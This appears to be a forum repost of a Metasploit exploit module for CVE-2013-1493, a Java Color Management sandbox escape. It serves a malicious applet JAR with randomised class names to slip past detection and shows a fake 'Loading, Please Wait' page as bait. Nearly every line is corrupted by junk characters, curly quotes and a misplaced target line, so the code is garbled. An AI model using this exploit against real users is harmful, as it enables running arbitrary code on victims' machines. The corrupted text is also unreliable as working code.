##
8 a- N6 i/ z6 A8 X& Z: y# @
/ J$ y8 u3 L" ?' a! P# This file is part of the Metasploit Framework and may be subject to5 b8 |" H; a$ M3 D2 f$ ~! N; V- R
# redistribution and commercial restrictions. Please see the Metasploit4 X& {: a) S, y6 e ?- Q/ F
# web site for more information on licensing and terms of use.
) L$ x6 P1 ?$ ~' @$ y# http://metasploit.com/
2 @& P3 c2 O8 V& O8 H$ r##
1 z" c# I5 l5 W1 }' Qrequire ‘msf/core’
$ G- k8 a* p8 i2 M3 `$ Frequire ‘rex’! F2 d& n- C% Y+ k. X
class Metasploit3 < Msf::Exploit::Remote
* R% ~4 ]5 {+ a+ k1 ZRank = NormalRanking
# x6 e! D# e4 z0 Qinclude Msf::Exploit::Remote::HttpServer::HTML
4 r r! K! g& b9 n' oinclude Msf::Exploit::EXE% g5 F( `7 D' A% w: e; n
include Msf::Exploit::Remote::BrowserAutopwn5 {! R" j* N# x; M" b6 t
autopwn_info({ :javascript => false })
$ Q6 U$ p& R. Ndef initialize( info = {} ) E; D6 \- ~9 @$ r4 f' ^/ b2 [
super( update_info( info,6 |, }3 H+ U8 L% }/ L! `# g! F& _: O
‘Name’ => ‘Java CMM Remote Code Execution’,! H( t6 e* v0 j# e$ x ^
‘Description’ => %q{
' u4 b2 I; ^+ e5 C, j, U) T3 c# RThis module abuses the Color Management classes from a Java Applet to run5 v% v& K# d# @2 z g, ~
arbitrary Java code outside of the sandbox as exploited in the wild in February
3 P5 S8 q& F" G' D6 X8 l2 b! \and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
" S' U) R' ^5 e9 aand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1% ]! y& v2 J# h) n. {6 X5 a" x
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java' y. j0 q7 }+ A% P: ]
warning in order to run the malicious applet.9 c8 q+ S( G2 L! _! { `
},+ Q- v9 G1 d+ Q8 Y5 j
‘License’ => MSF_LICENSE,* T- G7 ]+ {- A% _! {) A
‘Author’ =>
4 L) t% J; w- M! ~! F'Unknown', # Vulnerability discovery and Exploit) D* u E' `, y2 d0 n: q e
'juan vazquez' # Metasploit module (just ported the published exploit)2 n' j6 a2 E2 d2 |5 C) [. h
],
4 S B. Y; \& K+ z# _) x: b‘References’ =># b) s+ \- b% T$ _) V* A
[
9 M% I) M7 p# W1 w( D! k3 a[ 'CVE', '2013-1493' ],, k( L) _' L5 p7 [$ o
[ 'OSVDB', '90737' ],
) ]- i' {1 F1 v& s6 r[ 'BID', '58238' ],
9 f6 r4 |* a- H2 Z1 |0 |[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
- H3 W, p% M5 u8 L3 v% T[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
" f* F+ [0 l; N7 j% \[ 'URL', 'http://pastie.org/pastes/6581034' ]" `7 ^0 B* P- d( W& T
],' N( `6 b$ H8 e2 |4 t+ Q5 H1 S2 a5 b
‘Platform’ => [ 'win', 'java' ],8 Z0 p6 Y; R/ ~' v
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
V1 V: |# h" F7 k; r. G0 N‘Targets’ =>! s2 i; e5 X/ A; S. ?* M
[
8 r' q7 b7 D5 r! s[ 'Generic (Java Payload)',+ b- T) h7 q/ y4 r* G! `
{" [$ R3 H' x3 w& j! @7 q
'Platform' => 'java',3 L( L, [& m! L! ?
'Arch' => ARCH_JAVA3 b( u5 K+ m! K d* z# l% u
}7 Z/ V, Q7 K. q+ x, H& Z' r( n, ]
],, H& G: G7 P0 r5 H' p1 O8 j
[ 'Windows x86 (Native Payload)',8 U5 ?2 M) {, P0 W( d1 V
{
: j0 z% U$ U1 ~'Platform' => 'win',0 G1 I; S; @% H
'Arch' => ARCH_X86* t8 b+ `) K& v5 ?/ O
}/ G y" P- }% s6 p8 H
]
% e( W6 [% P5 \$ f( f],
4 v& ]9 x/ G/ n/ E8 V( H4 r‘‘DisclosureDate’ => ‘Mar 01 2013′- Z, ^7 A% |" O6 O8 a* {' `3 D1 {& @
))* k& \6 H u! [- f
end! i X4 k$ v$ a/ P1 e& r7 D
def setup. x# ~( W! O" u7 A( u7 g1 u
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
& S! S3 h' e* Z; h* c, @+ j@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
9 l2 {* l5 l5 G7 d9 v7 h# `path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)5 H9 E5 r& e" q6 n. h( b. g
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ g8 R" f1 m* x
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)1 ^; J! W* U6 [ m9 L
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
: R$ x8 h# q* a5 c( ^path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)) T9 E f' |' u7 f
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
( K+ ]0 d, i: \7 T5 F* O@init_class_name = rand_text_alpha(“Init”.length)
9 ^* Y0 V" m' B; ^3 h' u" `, d@init_class.gsub!(“Init”, @init_class_name)2 j" t4 h" { Y. N& b( n$ ]
super O& P. u1 ]8 [/ x* @7 P
end
2 E. u8 D( |2 [+ w2 kdef on_request_uri(cli, request)+ ~* Y- ^& e" |
print_status(“handling request for #{request.uri}”)+ z" T0 a. K" K" Y# V" W
case request.uri
! W% K' m2 O! n7 U' lwhen /\.jar$/i
3 V1 J! S6 ?- n J2 d0 W. Y! Bjar = payload.encoded_jar
# p8 j$ Y# l: @! |; Q) djar.add_file(“#{@init_class_name}.class”, @init_class)
2 G8 U. X# \# ejar.add_file(“Leak.class”, @leak_class)# q4 ~1 e# A& l4 O6 P
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)0 W. @+ p. g% W+ U0 g$ E* }7 l! O5 @
jar.add_file(“MyColorSpace.class”, @color_space_class): y5 S1 u/ ^6 W3 e0 Y+ `( I9 _4 ]% f! a
DefaultTarget’ => 1,
* s+ B- j C) g- Umetasploit_str = rand_text_alpha(“metasploit”.length)
! r! L) Z/ c0 _( @. G: {; upayload_str = rand_text_alpha(“payload”.length)2 t) c, _" U, N: c
jar.entries.each { |entry|
( t, t# T1 d5 h ~- lentry.name.gsub!(“metasploit”, metasploit_str)
1 X7 D; L* C0 l3 u. d# eentry.name.gsub!(“Payload”, payload_str)* ^- P: O5 {1 _+ x0 [' Y2 r7 P
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
! x/ [3 N. v$ Q/ C0 y, Y$ ^entry.data = entry.data.gsub(“Payload”, payload_str)
' l, }; e Z+ c0 d- u# d. B}
$ w0 z1 ?) P; p: tjar.build_manifest
; E$ l/ n( K, p; }7 z5 m& N( }send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
4 H2 A8 P0 w: S$ vwhen /\/$/' x/ ]5 z5 z2 z9 f
payload = regenerate_payload(cli)" ^% S6 ^+ r0 f- g
if not payload
* J' W" S. m1 z/ k; a( ?print_error(“Failed to generate the payload.”)
* j( q/ \, E& `* j$ tsend_not_found(cli)$ {2 g7 A# C8 d* r% N
return+ w4 I. p1 c8 q/ l
end
7 x/ X5 A G1 R3 }& ]send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })7 o' i I: W, W% U3 n
else
8 }) W, _$ F7 }* j) D9 O' ^5 H7 Hsend_redirect(cli, get_resource() + ‘/’, ”)2 j/ T. n# J% H
end! @6 W( J. ?2 T# I4 M
end
X" V4 E7 _! E. R4 Wdef generate_html
6 z& O4 S$ v+ n$ Whtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
) z2 D8 D# D. B3 B; n+ @; K' Bhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
X' S1 t$ @' ?; v, [& K6 O& b @html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|1 c6 z; c: V) o# O: v
html += %Q|</applet></body></html>|$ V- F, R* i9 S0 ~) H* j
return html5 p8 G$ s |: h$ ]5 a# h
end+ c5 d1 _) P! _$ S" ~3 _ P
end
X% A/ ]: J5 E2 P1 Hend: B6 R: S$ Y2 z2 E
|
发表于 2013-4-4 17:31:17
收藏
支持
反对